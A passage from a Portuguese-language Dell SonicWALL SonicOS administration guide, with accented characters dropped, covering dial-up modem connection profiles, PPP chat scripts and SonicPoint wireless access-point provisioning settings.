do modem usada como um estouro ou em situaes de balanceamento de carga para evitar
a sobrecarga da conexo.
No campo Mx. de hosts, digite o nmero mximo de hosts que sero permitidos quando esta
interface estiver conectada. O valor padro "0", o que permite um nmero ilimitado de ns.
Modem > Perfis de conexo

A pgina Modem > Perfis de conexo permite que voc configure perfis de modem no
dispositivo de segurana Dell SonicWALL que usa suas informaes de discagem do ISP para
a conexo. Vrios perfis de modem podem ser usados quando voc tiver um perfil diferente
para ISPs individuais.
O perfil atual exibido na tabela Perfis de conexo, que exibe as seguintes informaes do
perfil:
Nome O nome que voc atribuiu ao perfil. possvel usar nomes como Casa, ,
Escritrio ou Viagem para distinguir os diferentes perfis entre si.
Endereo IP O endereo IP da conexo de Internet.
Tipo de conexo Exibe Persistente, Conectar em dados ou Discagem manual,
dependendo da opo selecionada na janela Perfil de configurao para o perfil.
Configurar Clicar no cone de edio permite editar o perfil. Se clicar no cone de
excluso, o perfil ser excludo.

Configurando um perfil
Para adicionar ou configurar um perfil de conexo, faa o seguinte:
Etapa 1 Na pgina Modem > Perfis de conexo, clique no boto Adicionar. A janela Configurao
de perfis do modem exibida para configurar um perfil de conexo discada.
Depois de criar seus perfis, possvel ento configurar e especificar quais perfis devero ser
usados para o failover de WAN ou o acesso Internet.
Para definir as configuraes do ISP, voc deve obter suas informaes da Internet a partir do
seu Provedor de Servios de Internet discada.
Geral
Etapa 2 Na pgina Configuraes gerais, digite um nome para o seu perfil discado no campo Nome
do perfil.
Etapa 3 Digite o nmero primrio usado para discar o seu ISP no campo Nmero primrio discado.
Dica Se um prefixo especfico for usado para acessar uma linha externa, como o 9 ou &, digite
o nmero como parte do nmero de telefone primrio.
Etapa 4 Digite o nmero secundrio usado para discar o seu ISP no campo Nmero secundrio
discado (opcional).
Etapa 5 Digite o seu nome de usurio do ISP de discagem no campo Nome de usurio.
Etapa 6 Digite a senha fornecida pelo seu ISP de discagem no campo Senha do usurio.
Etapa 7 Confirme sua senha do ISP de discagem no campo Confirmar senha de usurio.
Etapa 8 Se o seu ISP forneceu um script que executado ao acessar sua conexo do ISP, recorte e
cole o texto do script no campo Script de bate-papo. Consulte as Informaes na seo
Scripts de bate-papo na pgina 449 para obter mais informaes sobre como usar os scripts
de bate-papo.

Endereo ISP
Etapa 9 Clique na guia Endereo ISP.
Etapa 10 Na seo Configurao do endereo ISP, selecione Obter um endereo IP

automaticamente se voc no tiver um endereo IP de discagem permanente do seu ISP. Se
voc tiver um endereo IP de discagem permanente do seu ISP, selecione Usar o seguinte
endereo IP e digite o endereo IP no campo correspondente.
Etapa 11 Se voc obtiver um endereo IP automaticamente para o(s) seu(s) servidor(es) DNS, selecione
Obter um endereo IP automaticamente. Se o seu provedor tiver um endereo IP especfico
para o(s) servidor(es) DNS, selecione Usar o seguinte endereo IP e digite o endereo IP do
servidor DNS primrio no campo correspondente. Tambm possvel adicionar um endereo
do servidor DNS secundrio no campo abaixo.
Parmetros
Etapa 12 Clique na guia Parmetros. Use as configuraes da pgina para configurar o comportamento
de discagem do modem.
Etapa 13 No menu Tipo de conexo, selecione uma das seguintes opes:

Conexo persistente Ao selecionar Conexo persistente, o modem permanece
conectado, a menos que voc clique no boto Desconectar na pgina Rede >
Configuraes. Se a opo Habilitar failover de WAN de discagem estiver

selecionada na pgina Rede > Failover de WAN e Balanceamento de carga, o
modem discar automaticamente em caso de falha de uma conexo WAN. Se no for
possvel conectar o Perfil primrio, o modem usar o Perfil alternativo 1 para discar
um ISP.
Conectar em dados Usar a opo Conectar em dados requer que os dados de
sada sejam detectados antes que o modem disque o ISP. Os dados de sada no
precisam ser o riginados de computadores na LAN, eles tambm pode ser pacotes
gerados pelos aplicativos integrados de segurana do dispositivo de segurana Dell
SonicWALL, como a Atualizao automtica e o Antivrus. Se a opo Habilitar
Failover da WAN estiver selecionada na pgina Modem > Failover, os pings gerados
pela investigao podero acionar a discagem pelo modem quando nenhuma conexo
WAN Ethernet for detectada. Se no for possvel conectar o Perfil primrio, o modem
usar o Perfil alternativo 1 para discar um ISP.
Conexo manual Selecionar Conexo manual para um Perfil primrio significa
que uma conexo de modem no ocorrer automaticamente. necessrio clicar no
boto Conectar na pgina Rede > Configuraes para que a conexo discada seja
estabelecida. Alm disso, o Failover da WAN no ocorre automaticamente.
Cuidado Se voc estiver configurando dois perfis de discagem para o failover da WAN, o
comportamento do modem deve ser o mesmo para cada um dos perfis. Por exemplo, se o
seu Perfil primrio usar a Conexo persistente, o seu Perfil secundrio tambm dever usar
a Conexo persistente. Se voc habilitar a Conexo persistente para o modem, a conexo
do modem permanecer ativa at que a conexo WAN Ethernet seja reativada ou voc
force a desconexo, clicando em Desconectar na pgina Configurar.
Etapa 14 Se voc selecionou Conectar em dados ou Conexo manual, digite o nmero de minutos
que uma conexo discada ter permisso de ficar inativa no campo Habilitar Desconexo por
inatividade (minutos) .
Etapa 15 Selecione a velocidade de conexo no menu Velocidade mxima de conexo (bps).
Automtica a configurao padro que o dispositivo de segurana Dell SonicWALL detecta
automaticamente a velocidade da conexo ao se conectar ao ISP; como alternativa, voc pode
selecionar uma opo de velocidade especfica no menu.
Etapa 16 Selecione Habilitar tempo mx. de conexo (minutos) se a conexo for encerrada aps o
tempo especificado. Digite o nmero de minutos para que a conexo fique ativa. O valor pode
variar entre 0 a 1.440 minutos. Este recurso no entra em conflito com a configurao
Desconectar por inatividade. Se os dois recursos forem configurados, a conexo ser
encerrada com base no menor tempo configurado.
Etapa 17 Se voc selecionar Habilitar tempo mx. de conexo (minutos), digite o nmero de minutos
de atraso antes de discar novamente o ISP em Atraso antes de reconectar (minutos). O
valor pode variar de 0 a 1.440 e o valor padro 0, o que significa que no h atraso antes da
nova conexo com o ISP.
Etapa 18 Se voc tiver uma chamada em espera na linha de telefone, voc deve desativ-la, pois outra
chamada poder interromper sua conexo ao ISP. Selecione Desabilitar chamada em espera
e, em seguida, selecione um comando da lista. Se voc no visualizar seu comando na lista,
selecione Outro e digite o comando no campo. Se no tiver certeza de qual comando usar,
consulte a documentao fornecida com o seu servio de telefone ou entre em contato com
seu provedor de servios de telefone.

Etapa 19 Se o nmero de telefone do seu ISP estiver ocupado, voc poder configurar o nmero de
vezes que o modem do dispositivo de segurana Dell SonicWALL tentar se conectar no
campo Tentativas de discagem por nmero de telefone. O valor padro 0.
Etapa 20 Digite o nmero de segundos entre as tentativas de rediscagem no campo Atraso entre
tentativas (segundos). O valor padro 5 segundos.
Etapa 21 Selecione Desabilitar VPN quando discado se as Associaes de Segurana (SAs) da VPN
estiverem desativadas quando o modem se conectar ao ISP. Encerrar a conexo discada
reativar as SAs da VPN. Isto til se voc deseja implantar sua prpria rede RAS ponto a
ponto e deseja que os pacotes sejam enviados sem codificao para suas intranets.
Programao
Etapa 22 Clique na guia Programao.
Etapa 23 Se desejar especificar tempos programados que o modem pode se conectar, selecione Limitar
horrios para perfil de discagem. Digite os horrios para cada dia no formato de 24 horas
que voc deseja que o modem seja capaz de fazer uma conexo.
Etapa 24 Clique em OK para adicionar o novo perfil de discagem no dispositivo de segurana Dell
SonicWALL. O Perfil de discagem ser exibido na tabela Perfis de conexo.
Scripts de bate-papo
Alguns servidores legados podem exigir scripts de bate-papo especficos para a empresa para
efetuar login nos servidores de discagem.
Um script de bate-papo, como outros tipos de scripts, automatiza o ato de digitar comandos
com um teclado. Ele consiste em comandos e respostas constitudos de grupos de pares de
espera-resposta, bem como comandos de controle adicionais, usados pelo intrprete do script
de bate-papo no TELE3 SP. O TELE3 SP usa um script padro de bate-papo que funciona com
a maioria dos ISPs, mas o seu ISP pode exigir um script de bate-papo com comandos
especficos para "bater papo" com o seu servidor. Se um ISP exigir um script de bate-papo
especfico, ele geralmente fornecido a voc com as informaes de acesso discagem. O
script padro de bate-papo para o TELE3 SP apresenta os seguintes comandos:
ABORT `NO DIALTONE'
ABORT `BUSY'
ABOR `NO CARRIER'

"ATQ0
"ATE0
"ATM1
"ATL0
"ATV1
OK ATDT\T
CONNECT \D \C
Os trs primeiros comandos direcionam o intrprete do script de bate-papo para abortar se
qualquer uma das cadeias de caracteres NO CARRIER, NO DIALTONE ou BUSY forem
recebidas do modem.
Os prximos cinco comandos so comandos AT que informam o intrprete de bate-papo para
no aguardar, j que " define uma cadeia de caracteres vazia, e configuram o seguinte no
modem: retornar respostas dos comandos, no ecoar caracteres, reportar a taxa de
transmisso da conexo quando conectada e retornar respostas detalhadas.
A prxima linha tem OK como a cadeia de caracteres esperada e os intrpretes aguardam para
que OK seja retornado em resposta ao comando anterior, ATV1, antes de continuar o script.
Se OK no for retornado no perodo de tempo padro de 50 segundos, o intrprete de bate-
papo abortar o script e ocorrer uma falha na conexo. Se OK for recebido, o prefixo e
nmero de telefone da conta discada selecionada serro discados. O comando \T
substitudo pelo intrprete do script de bate-papo com o prefixo e nmero de telefone da conta
discada.
Na ltima linha do script, CONNECT a resposta esperada do modem remoto. Se os modems
forem conectados com xito, CONNECT ser retornado do modem TELE3 SP. O comando \D
adicionar uma pausa de um segundo para permitir que o servidor d incio autenticao
PPP. O comando \C termina no final do script de bate-papo sem enviar uma nova linha para o
modem. O TELE3 SP ento tenta estabelecer uma conexo PPP (Point-to-Point Protocol) pelo
link serial. A conexo PPP geralmente inclui a autenticao do usurio usando o PAP
(Password Authentication Protocol) ou o CHAP (Challenge Handshake Authentication
Protocol) do conjunto PPP. Depois que uma conexo PPP for estabelecida, ela se parecer
com qualquer outra interface de rede.
Scripts de bate-papo personalizados
Os scripts de bate-papo personalizados podem ser usados quando o servidor de discagem do

ISP no usar o PAP ou CHAP como um protocolo de autenticao para controlar o acesso. Em
vez disso, o ISP exige que um usurio efetue o login no servidor de discagem, solicitando um
nome de usurio e senha antes de estabelecer a conexo PPP. Em geral, este tipo de servidor
faz parte dos sistemas legados enraizados na arquitetura de login do terminal "burro". Como
estes tipos de servidores podem solicitar um nome de usurio e senha de vrias maneiras ou
exigir comandos posteriores para iniciar a conexo PPP, um campo Script de bate-papo
fornecido para que voc insira um script personalizado.
Se um script de bate-papo personalizado for solicitado por um ISP para estabelecer uma
conexo, ele geralmente encontrado em seu site ou fornecido com suas informaes de
acesso discagem. s vezes, os scripts podem ser encontrados por meio de mecanismos de
busca na Internet e usando as palavras-chave "script de bate-papo ppp Linux <nome do ISP>".
Um script de bate-papo personalizado pode ser parecido com o script a seguir:
ABORT `NO CARRIER'
ABORT `NO DIALTONE'
ABORT `BUSY'
" ATQ0
" ATE0
" ATM1
" ATW2
" ATV1

OK ATDT\T
CONNECT "
sername: \L
assword: \P
Dica O primeiro caractere do nome de usurio e senha so ignorados durante a autenticao

PPP.
O script se parece muito com o script anterior, com a exceo dos comandos no final. H uma
cadeia de caracteres vazia (") depois de CONNECT, que envia o comando de uma nova linha
para o servidor. O intrprete de bate-papo ento aguarda pela subcadeia de caracteres
sername:. Quando uma resposta retornada, o atual nome da conta de usurio do PPP, que
substitui a cadeia de caracteres de controle de comando \L, enviada. Em seguida, o
intrprete de bate-papo aguarda pela subcadeia assword: e envia a senha, substituindo \P
pela senha da conta do PPP. Se as subcadeias username ou password no forem recebidas
dentro do perodo de tempo limite, o intrprete de bate-papo abortar o processo de discagem,
resultando em uma falha na discagem.

Parte 7
Configuraes
| 453
Captulo 33
Gerenciando SonicPoints
SonicPoint > SonicPoints

O SonicWALL SonicPoints so pontos de acesso sem fio especialmente projetados para
funcionarem com dispositivos de segurana SonicWALL para fornecer acesso sem fio em sua
empresa. A seo SonicPoint da Interface de gerenciamento permite gerenciar os SonicPoints
conectados ao seu sistema.
Alm de descrever as configuraes disponveis para o gerenciamento de SonicPoints no

SonicOS Enhanced, esta seo contm um guia de prticas recomendadas para a implantao
de SonicPoints em sua rede. Consulte Prticas recomendadas para implantao do SonicPoint
na pgina 474.
Gerenciando SonicPoints | 455

Antes de gerenciar SonicPoints
Antes de poder gerenciar os SonicPoints na Interface de gerenciamento, execute os seguintes
passos:
Verifique se a imagem do SonicPoint baixada para o seu dispositivo de segurana
SonicWALL. Consulte Atualizando firmware do SonicPoint na pgina 471.
Configure seus Perfis de provisionamento do SonicPoint.
Configura uma zona sem fio.
Atribuir perfis a zonas sem fio. Esta etapa opcional. Se voc no atribuir um perfil padro
para uma zona, os SonicPoints nessa zona usaro o primeiro perfil na lista.
Atribua uma interface zona sem fio.
Anexe os SonicPoints nas interfaces na zona Sem fio.
Teste o SonicPoints.
Perfis de provisionamento do SonicPoint

Perfis de provisionamento do SonicPoint fornecem um mtodo flexvel e altamente
automatizado de configurao e provisionamento de vrios SonicPoints em uma arquitetura de
Sem fio distribudos. As definies do Perfil do SonicPoint incluem todos os ajustes que podem
ser configurados em um SonicPoint, como configuraes de rdio para rdios de 2,4GHz e
5GHz e canais de operao.
Uma vez que voc definiu um perfil de SonicPoint, voc pode aplic-lo a uma zona Sem fio.
Cada zona Sem fio pode ser configurada com um perfil de SonicPoint. Qualquer perfil pode ser
aplicado a qualquer nmero de zonas. Ento, quando um SonicPoint est conectado a uma
zona, ele automaticamente fornecido com o perfil atribudo a essa zona.
O SonicOS inclui dois perfil padro do SonicPoints: SonicPointN e SonicPointNDR (para
SonicPoint-N Dual Radio). Voc pode modificar esses perfis ou criar novos.

O dispositivo Dell SonicWALL SonicPoint-N Dual Radio Wi-Fi Certified pela Wi-Fi Alliance.
A logo Wi-Fi CERTIFIED uma marca de certificao da Wi-Fi Alliance e indica que o produto
passou por rigorosos testes da Wi-Fi Alliance e demonstrou interoperabilidade com outros
produtos, incluindo os de outras empresas que trazem o logotipo da Wi-Fi CERTIFIED.
Configurando um perfil SonicPoint

O processo de configurao de perfil do SonicPoint varia um pouco, dependendo se voc
estiver configurando um SonicPoint ou um SonicPoint-N Dual Radio. As sees a seguir
descrevem como configurar os dois tipos de perfis SonicPoint:
Configurando um perfil do SonicPointN na pgina 457
Configurando um perfil de SonicPoint NDR na pgina 464
Configurando um perfil do SonicPointN
Voc pode adicionar qualquer nmero de perfis do SonicPoint. As especificaes da

configurao variar um pouco, dependendo de quais protocolos 802.11 voc selecionar. Para
configurar um perfil de provisionamento SonicPoint-N, execute as seguintes tarefas:
Etapa 1 Para adicionar um novo perfil, clique em Adicionar SonicPoint abaixo da lista de perfis de
proviso do SonicPoint 802.11n. Para editar um perfil existente, selecione o perfil e clique no
cone Configurar na mesma linha do perfil que voc est editando.
Etapa 2 Na guia Configuraes da janela Adicionar perfil, especifique:

Habilitar SonicPoint: Marque para habilitar automaticamente cada SonicPoint quando
fornecido com este perfil.
Manter configuraes: Marque esta opo para que o SonicPointNs fornecido por
este perfil retenha essas configuraes depois de serem excludas e sincronizadas
novamente. Clique no boto Editar para especificar as categorias de configuraes
que sero mantidas.
Prefixo de nome: Insira um prefixo para os nomes de todos os SonicPointNs

conectados a esta zona. Quando cada SonicPointN fornecido, ele recebe um nome
que consiste no prefixo de nome e um nmero exclusivo, por exemplo: SonicPoint
126008.
Cdigo do pas: Selecione o pas onde voc est operando o SonicPointNs. O cdigo
do pas determina qual domnio regulatrio a operao de rdio cai.
Grupo de PA virtual de rdio 802.11nAP: (opcional) Selecione um grupo de Ponto de
acesso virtual (VAP) para atribuir esses SonicPointNs a um VAP. Este menu suspenso
permite que voc crie um novo grupo VAP. Para obter mais informaes sobre VAPs,
consulte SonicPoint > Ponto de acesso virtual na pgina 493.

Etapa 3 Na guia 802.11n, configure os ajustes de rdio para o rdio 802.11n.
Habilitar rdio: Marque para habilitar automaticamente bandas de rdio 802.11n em

todos os SonicPoints fornecidos com este perfil.
Modo de rdio: Selecione seu modo de rdio preferencial do menu Modo de rdio. O
dispositivo de segurana sem fio suporta os seguintes modos:
Somente 2.4 GHz 802.11n - Permite que somente clientes 802.11n acessem a sua
rede sem fio. Os clientes 802.11a/g/b no conseguem se conectar neste modo de
rdio restrito.
2.4GHz 802.11n/g/b misto - Suporta clientes 802.11b, 802.11g e 802.11n
simultaneamente. Se sua rede sem fio consistir de vrios tipos de clientes,
selecione esse modo.
Dica Para melhor velocidade de sada, o SonicWALL recomenda o modo de rdio Somente
802.11n. Use o modo 802.11n/g/b misto para uma autenticao de compatibilidade de
vrios clientes sem fio.

2.4GHz 802.11g somente - Se sua rede sem fio consistir somente de clientes
802.11g, voc pode selecionar este modo para maior desempenho de 802.11g.
Voc tambm pode selecionar esse modo se desejar impedir clientes 802.11b da
associao.
Somente 5 GHz 802.11n - Permite que somente clientes 802.11n acessem a sua
rede sem fio. Os clientes 802.11a/g/b no conseguem se conectar neste modo de
rdio restrito.
5GHz 802.11n/a misto - Suporta clientes 802.11a e 802.11n simultaneamente. Se
sua rede sem fio consistir de ambos os tipos de clientes, selecione esse modo.
5GHz 802.11a somente - Selecione esse modo se somente clientes 802.11
acessam sua rede sem fio.
SSID: Insira uma cadeia de caracteres reconhecvel para o SSID de cada SonicPoint
usando este perfil. Esse o nome que ir aparecer nas listas de clientes das conexes
sem fio disponveis.
Nota Se todos os SonicPoints em sua organizao compartilharem o mesmo SSID, mais fcil
para os usurios manter a conexo sem fio em roaming de um SonicPoint para outro.
Quando o rdio sem fio configurado para um modo que suporta 802.11n, as opes a seguir
so exibidas:
Banda de rdio (somente 802.11n): Configura as bandas para o rdio 802.11n.
Automtico - Permite que o dispositivo detecte e defina o canal ideal para operao sem
fio com base na intensidade do sinal e integridade automaticamente. Esta a configurao
padro.
Padro Canal de 20 MHz - Especifica que o rdio 802.11n usar somente o canal de 20
MHz padro. Quando essa opo selecionada, o menu suspenso Canal padro
exibido.
Canal padro - Esse menu suspenso exibe apenas quando o canal de 20 MHz est
selecionado. Por padro, definido como Automtico, o que permite que o dispositivo
defina o canal ideal na intensidade do sinal e integridade. Como alternativa, voc pode
selecionar um nico canal dentro do intervalo de seu domnio regulatrio. Selecionar
um determinado canal tambm pode ajudar a evitar interferncia com outras redes sem
fio na rea.
Amplo Canal de 40 MHz - Especifica que o rdio 802.11n usar somente o canal de 40
MHz padro. Quando essa opo selecionada, os menus suspensos Canal primrio e
Canal secundrio so exibidos.
Canal primrio - Por padro, definido como Automtico. Como alternativa,
possvel especificar um canal primrio.
Canal secundrio - A configurao do menu suspenso controlada pela seleo do
canal primrio:
Se o canal primrio definido como Automtico, o canal secundrio tambm
definido como Automtico.
Se o canal primrio definido como um canal especfico, o canal secundrio
definido para o melhor canal para evitar a interferncia com o canal primrio.
Habilitar intervalo de proteo curto: Especifica o intervalo de proteo curto de 400ns (e
no o intervalo de proteo padro do 800ns). O intervalo de proteo uma pausa na
transmisso destinada a evitar a perda de dados com interferncia ou atrasos de vrios
caminhos.

Habilitar agregao: Permite a agregao de quadros 802.11n, que combina vrios quadros
para reduzir a sobrecarga e aumentar a velocidade de processamento.
Dica As opes Habilitar intervalo de proteo curto e Habilitar agregao podem melhorar
ligeiramente a velocidade de processamento. Ambas funcionam melhor em condies
ideais de rede onde os usurios tm sinais fortes e com pouca interferncia. Em redes que
possuem condies no to ideais (interferncia, sinais fracos, etc.), essas opes podem
apresentar erros de transmisso que dispensam qualquer ganho de eficincia na taxa de
transferncia.
Imposio de ACL: Selecione isso para impor o Controle de acesso, permitindo ou negando
o trfego de dispositivos especficos. Selecione um grupo de endereo MAC da Lista de
permisses para permitir automaticamente o trfego de todos os dispositivos com endereos
MAC no grupo. Selecione um grupo de endereo MAC da Lista de negaes para negar
automaticamente o trfego de todos os dispositivos com endereos MAC no grupo. A lista de
negaes imposta antes da lista de permisses.
Etapa 4 Na seo Segurana sem fio da guia Rdio 802.11n, configure as seguintes configuraes:
Tipo de autenticao: Selecione o mtodo de autenticao para sua rede sem fio.
Voc pode selecionar WEP - Ambos (Sistema aberto e Chave compartilhada), WEP
- Sistema aberto, WEP Chave compartilhada, WPA-PSK, WPA-EAP, WPA2-PSK,
WPA2-EAP, WPA2-AUTO-PSK e WPA2-AUTO-EAP.
Configurao WEP
Modo de chave WEP: Seleciona o tamanho da chave de criptografia.
Chave padro: Selecione qual chave na lista a seguir a chave padro, que ser
tentada primeiro ao tentar autenticar um usurio.
Entrada da chave: Selecione se a chave alfanumrica ou hexadecimal.
Chave 1 - Chave 4: Digite as chaves de criptografia para criptografia WEP. Insira a
mais provvel de ser usada no campo que voc selecionou como a chave padro.
Configurao de WPA2 ou WPA:

Tipo de criptografia: A criptografia que criptografa seu dados sem fio. Escolha TKIP
(mais antigo, mais compatvel), AES (mais recente, mais seguro) ou Ambos
(compatvel com verses anteriores).
Intervalo de chaves do grupo: O perodo de tempo o qual uma Chave de grupo
vlida. O valor padro de 86.400 segundos. A configurao para baixo de um valor
pode causar problemas de conexo.
Cdigo de acesso (somente PSK): Este o cdigo de acesso que seus usurios da
rede devem inserir para obter acesso rede.
Configuraes do servidor Radius (Somente EAP): Definir as configuraes do
servidor de autenticao RADIUS.

Etapa 5 Na guia Avanado, configure os ajustes de desempenho para o rdio 802.11n. Para a maioria
das opes avanadas de 802.11n, as configuraes padro oferecem um desempenho timo.
Ocultar SSID em sinal: Marque esta opo para ter a difuso de SSID como parte do
sinal sem fio, em vez de uma transmisso separada.
Programar sondagem de IDS: Selecione uma hora quando houver menos
necessidades na rede sem fio para agendar uma verificao do Servio de deteco
de intruses (IDS) para minimizar a inconvenincia de quedas de conexo sem fio.
Taxa de dados: Selecione a velocidade em que os dados so transmitidos e
recebidos. Ideal automaticamente seleciona o melhor taxa disponvel em sua rea de
acordo com a interferncia e outros fatores. Ou voc pode selecionar uma taxa de
dados manualmente.
Potncia de transmisso: Selecione a potncia de transmisso. A potncia de
transmisso afeta o alcance do SonicPoint. Voc pode selecionar: Alimentao total,
Metade (-3 dB), Um quarto (-6 dB), Um oitavo (-9 dB), ou Mnimo.
Diversidade da antena: A configurao Diversidade de antena determina qual
antena o SonicPoint usa para enviar e receber dados. Quando Ideal selecionada, o
SonicPoint automaticamente seleciona a antena com o sinal mais forte e mais limpo.

Intervalo de sinais (milsimos de segundo): Insira o nmero de milsimos de
segundo entre o envio de sinais sem fio.
Intervalo DTIM: Insira o intervalo em milissegundos.
Limite de fragmentao (bytes): Insira o nmero de bytes de dados fragmentados
que deseja permitir na rede.
Limite RTS (bytes): Insira o nmero de bytes.
Mximo de associaes de cliente: Insira o nmero mximo de clientes que voc
deseja que o SonicPoint suporte neste rdio de uma s vez.
Comprimento do prembulo: Selecione o comprimento do prembulo - o envio de
comunicao sem fio inicial ao associar um host sem fio. Voc pode selecionar Longo
ou Curto.
Modo de proteo: Selecione a proteo CTS ou RTS. Selecione Nenhum, Sempre
ou Automtico. Nenhum o padro.
Taxa de proteo: Selecione a velocidade para a proteo CTS ou RTS, 1 Mbps, 2
Mbps, 5 Mbps ou 11 Mbps.
Tipo de proteo: Selecione o tipo de proteo, Somente CTS ou RTS-CTS.
Habilitar tempo de slot curto: Permita aos clientes desassociar e reassociar mais
rapidamente.
Permitir conexo apenas de clientes 802.11g: Use esta opo se voc estiver
usando o modo Turbo G e, portanto, no est permitindo que os clientes 802.11b se
conectem.
Quando uma unidade de SonicPoint se conecta pela primeira vez e ligada, ela ter uma
configurao padro de fbrica (Endereo IP 192.168.1.20, nome de usurio: admin, senha:
password). Na inicializao, ele tentar encontrar um dispositivo SonicOS com o qual parear.
Se no for possvel localizar um ponto de dispositivo SonicOS, ele entrar em um modo
independente de operao com uma configurao separada independente, permitindo que ele
opere como um Ponto de acesso padro.
Se o SonicPoint localizar ou for localizado por um dispositivo par SonicOS atravs do Protocolo
de descoberta do firewall, uma troca criptografada entre as duas unidades garantiro que o
perfil associado zona sem fio relevante seja usado para configurar (provisionar)
automaticamente a nova unidade adicionada do SonicPoint.
Como parte do processo de provisionamento, o SonicOS atribuir ao dispositivo SonicPoint
descoberto um nome exclusivo e ele registrar seu endereo MAC e a interface e zona em que
foi descoberto. Ele poder tambm atribuir automaticamente o SonicPoint a um Endereo IP,
se assim configurado, para que o SonicPoint se comunique com um servidor de autenticao
para suporte ao WPA-EAP. O SonicOS, em seguida, usar o perfil associado zona relevante
para definir as configuraes de rdio de 5 GHz e 2,4 GHz.
As modificaes aos perfis no afetaro as unidades que j foram provisionadas e esto em
um estado operacional. Alteraes de configurao para dispositivos SonicPoint operacionais
podem ocorrer de duas maneiras:
Via alteraes manuais da configurao Apropriada quando um nico ou um pequeno
conjunto de alteraes est para ser afetado, especialmente quando esse SonicPoint
individual requer configuraes diferentes do perfil associado sua zona.
Via desconfigurao Excluir uma unidade SonicPoint efetivamente desconfigura a unidade
ou limpa sua configurao e coloca-o em um estado onde ele ser automaticamente colocado
em contato com o processo de provisionamento novamente com seu dispositivo par SonicOS.
Essa tcnica til quando o perfil de uma zona atualizado ou alterado e a alterao est
definida para propagao. Ele pode ser usado para atualizar o firmware no SonicPoints ou para

atualizar de modo simples e automtico vrias unidades SonicPoint de um modo controlado,
em vez de alterar todos os SonicPoints emparelhados ao mesmo tempo, o que pode causar
interrupes no servio.
Configurando um perfil de SonicPoint NDR
Voc pode adicionar qualquer nmero de perfis do SonicPoint. Para configurar um perfil de
provisionamento SonicPoint-N de rdio duplo:
Etapa 1 Para adicionar um novo perfil, clique em Adicionar SonicPoint abaixo da lista de perfis de
proviso do SonicPoint. Para editar um perfil existente, selecione o perfil e clique no cone
editar na mesma linha do perfil que voc est editando.
Etapa 2 Na guia Geral da janela Adicionar perfil, especifique:
Habilitar SonicPoint: Marque para habilitar automaticamente cada SonicPoint quando

fornecido com este perfil.

Manter configuraes: Marque esta opo para que o SonicPointNs fornecido por
este perfil retenha essas configuraes depois de serem excludas e sincronizadas
novamente. Clique no boto Editar para especificar as categorias de configuraes
que sero mantidas. Configuraes de restrio separadas podem ser ajustadas para
cada rdio SonicPointNDR.
Habilitar monitoramento por RF: Marque para habilitar o monitoramento de RF nos

SonicPoints.
Prefixo de nome: Insira um prefixo para os nomes de todos os SonicPoints
conectados a esta zona. Quando cada SonicPoint fornecido, ele recebe um nome
que consiste no prefixo de nome e um nmero exclusivo, por exemplo: SonicPoint
126008.
Cdigo do pas: Selecione o pas onde voc est operando o SonicPoints. O cdigo
do pas determina qual domnio regulatrio a operao de rdio cai.
Grupo de AP virtual 802.11g e Grupo AP virtual 802.11a: (opcional) Selecione um
grupo de Ponto de acesso virtual (VAP) para atribuir esses SonicPoints a um VAP. Este
menu suspenso permite que voc crie um novo grupo VAP. Para obter mais
informaes sobre VAPs, consulte SonicPoint > Ponto de acesso virtual na pgina 493.

Etapa 3 Na guia 802.11g, defina as configuraes de rdio para o rdio 802.11g (banda de 2,4 GHz):
Habilitar rdio 802.11g: Marque para habilitar automaticamente bandas de rdio

802.11g em todos os SonicPoints fornecidos com este perfil.
SSID: Insira uma cadeia de caracteres reconhecvel para o SSID de cada SonicPoint
usando este perfil. Esse o nome que ir aparecer nas listas de clientes das conexes
sem fio disponveis.
Nota Se todos os SonicPoints em sua organizao compartilharem o mesmo SSID, mais fcil
para os usurios manter a conexo sem fio em roaming de um SonicPoint para outro.
Modo de rdio: Selecione a velocidade da conexo sem fio. Voc pode escolher o
modo 11 Mbps - 802.11b, 54 Mbps - 802.11g, ou 108 Mbps - Turbo G. Se voc
escolher o modo Turbo, todos os usurios em sua empresa devero usar cartes de
acesso sem fio que oferecem suporte ao modo turbo.
Canal: Selecione o canal em que o rdio ir funcionar. O padro AutoChannel, que
seleciona automaticamente o canal com a menor interferncia. Use o AutoChannel
(Canal Auto), a no ser que exista uma razo para usar ou evitar canais especficos.
Imposio de ACL: Selecione isso para impor o Controle de acesso, permitindo ou
negando o trfego de dispositivos especficos. Selecione um grupo de endereo MAC
da Lista de permisses para permitir automaticamente o trfego de todos os
dispositivos com endereos MAC no grupo. Selecione um grupo de endereo MAC da

Lista de negaes para negar automaticamente o trfego de todos os dispositivos
com endereos MAC no grupo. A lista de negaes imposta antes da lista de
permisses.
Tipo de autenticao: Selecione o mtodo de autenticao para sua rede sem fio.
Voc pode selecionar WEP - Ambos (Sistema aberto e Chave compartilhada), WEP
- Sistema aberto, WEP Chave compartilhada, WPA-PSK, WPA-EAP, WPA2-PSK,
WPA2-EAP, WPA2-AUTO-PSK e WPA2-AUTO-EAP.
Modo de chave WEP: Seleciona o tamanho da chave de criptografia.
Chave padro: Selecione qual chave na lista a seguir a chave padro, que ser
tentada primeiro ao tentar autenticar um usurio.
Entrada da chave: Selecione se a chave alfanumrica ou hexadecimal.
Chave 1 - Chave 4: Digite as chaves de criptografia para criptografia WEP. Insira a
mais provvel de ser usada no campo que voc selecionou como a chave padro.
Etapa 4 Na guia 802.11g avanado, configure os ajustes de desempenho para o rdio 802.11g. Para
a maioria das opes avanadas de 802.11g, as configuraes padro oferecem um
desempenho timo.
Ocultar SSID em sinal: Marque esta opo para ter a difuso de SSID como parte do
sinal sem fio, em vez de uma transmisso separada.

Programar sondagem de IDS: Selecione uma hora quando houver menos
necessidades na rede sem fio para agendar uma verificao do Servio de deteco
de intruses (IDS) para minimizar a inconvenincia de quedas de conexo sem fio.
Taxa de dados: Selecione a velocidade em que os dados so transmitidos e
recebidos. Ideal automaticamente seleciona o melhor taxa disponvel em sua rea de
acordo com a interferncia e outros fatores. Ou voc pode selecionar uma taxa de
dados manualmente.
Potncia de transmisso: Selecione a potncia de transmisso. A potncia de
transmisso afeta o alcance do SonicPoint. Voc pode selecionar: Alimentao total,
Metade (-3 dB), Um quarto (-6 dB), Um oitavo (-9 dB), ou Mnimo.
Diversidade da antena: A configurao Diversidade de antena determina qual
antena o SonicPoint usa para enviar e receber dados. Voc pode selecionar:
Ideal: Esta a configurao padro. Quando Ideal selecionada, o SonicPoint
automaticamente seleciona a antena com o sinal mais forte e mais limpo. Na
maioria dos casos, Ideal a melhor configurao.
1: Selecione 1 para restringir o SonicPoint para usar a antena 1 somente. De frente
para a parte traseira do SonicPoint, antena 1 esquerda, mais prxima fonte
de alimentao.
